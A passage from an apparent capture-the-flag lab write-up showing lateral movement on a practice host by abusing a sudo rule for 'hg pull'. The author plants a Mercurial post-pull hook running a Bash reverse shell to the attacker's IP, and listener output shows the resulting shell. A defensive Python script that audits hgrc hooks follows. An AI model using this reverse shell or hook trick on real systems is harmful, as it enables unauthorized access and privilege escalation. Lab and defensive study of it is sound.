dev


The current user, qa, has a sudo privilege to execute /usr/bin/hg pull /home/dev/app-production/ as the dev user. Mercurial reads hook definitions from the hgrc of the repository it is run in, so that command will execute whatever hooks are configured there as dev.

qa@yummy:/dev/shm$ rm -rf .hg/*

Removing the data from the previous pull, so that the staging repository in /dev/shm starts clean

qa@yummy:/dev/shm$ cp ~/.hgrc .hg/hgrc

Copying the existing hgrc file into the .hg directory of the staging repository

qa@yummy:/dev/shm$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.15.34/7777 0>&1' > post-pull-shell.sh
qa@yummy:/dev/shm$ chmod 777 ./post-pull-shell.sh 

I then create a Bash reverse shell script, post-pull-shell.sh, and make it executable

I then edit the copied .hg/hgrc file to add a post-pull hook that executes the Bash reverse shell script

qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
pulling from /home/dev/app-production/
requesting all changes
adding changesets
adding manifests
adding file changes
added 6 changesets with 129 changes to 124 files
new changesets f54c91c7fae8:6c59496d5251
(run 'hg update' to get a working copy)

Then, executing the sudo-privileged command; the pull completes and fires the post-pull hook

┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ nnc 7777   
listening on [any] 7777 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.54.224] 52480
I'm out of office until October  8th, don't call me
dev@yummy:/dev/shm$ whoami
dev
dev@yummy:/dev/shm$ hostname
yummy
dev@yummy:/dev/shm$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:6e:41 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.54.224/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3095sec preferred_lft 3095sec

Lateral movement to the dev user achieved by exploiting the sudo-privileged command
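From the defender's side, the check worth running on a host like this is an audit of the hgrc files a sudo-allowed hg would read (the repository's .hg/hgrc and the invoking user's ~/.hgrc), listing every hook and why it should not be trusted. The script below is added example code written for this page, not part of the writeup or of Mercurial; its sample hgrc is constructed, and the hook names and paths in it are illustrative.

```python
"""Audit the [hooks] section of a Mercurial hgrc before trusting `hg pull`."""
import configparser
import os
import stat

# Constructed sample in the shape of the repo-level .hg/hgrc from the writeup.
# Hook names and paths are illustrative, not taken from the target.
SAMPLE_HGRC = """\
[ui]
username = qa
%include /etc/mercurial/site.rc

[hooks]
post-pull = ./post-pull-shell.sh
pretxncommit.check = python:hooks.check
incoming = /nonexistent/notify-hook.sh --quiet
"""


def parse_hooks(hgrc_text):
    """Return {hook_name: command} from the [hooks] section of hgrc text."""
    # hgrc allows %include / %unset directives that configparser does not
    # understand; drop them (a full audit would follow %include targets too).
    lines = [l for l in hgrc_text.splitlines() if not l.lstrip().startswith("%")]
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keep names as written, e.g. post-pull, pretxncommit.check
    cp.read_string("\n".join(lines))
    return dict(cp.items("hooks")) if cp.has_section("hooks") else {}


def audit_hook(name, command):
    """Classify one hook and note why a privileged `hg pull` should not trust it."""
    if command.startswith("python:"):
        return {"hook": name, "command": command, "kind": "python",
                "notes": ["in-process Python hook, imported as the invoking user"]}
    notes = []
    prog = command.split()[0] if command.split() else ""
    if not os.path.isabs(prog):
        # Shell hooks run with the repository root as cwd, so a relative path
        # is controlled by whoever controls the repository directory.
        notes.append("relative path resolved against the repository directory")
    elif not os.path.exists(prog):
        notes.append("target does not exist on this host")
    else:
        st = os.stat(prog)
        if st.st_uid not in (0, os.geteuid()):
            notes.append("target owned by uid %d, not root or the invoking user" % st.st_uid)
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            notes.append("target is group- or world-writable")
    return {"hook": name, "command": command, "kind": "shell", "notes": notes}


def audit_hgrc(hgrc_text):
    """Audit every hook in an hgrc; returns one finding dict per hook."""
    return [audit_hook(n, c) for n, c in parse_hooks(hgrc_text).items()]


if __name__ == "__main__":
    for f in audit_hgrc(SAMPLE_HGRC):
        print(f["hook"], f["kind"], f["command"], "; ".join(f["notes"]))
```

Run it as the user the sudo rule targets (here dev), since the ownership check compares against the invoking uid; any non-empty notes list is a hook that a privileged pull should not execute.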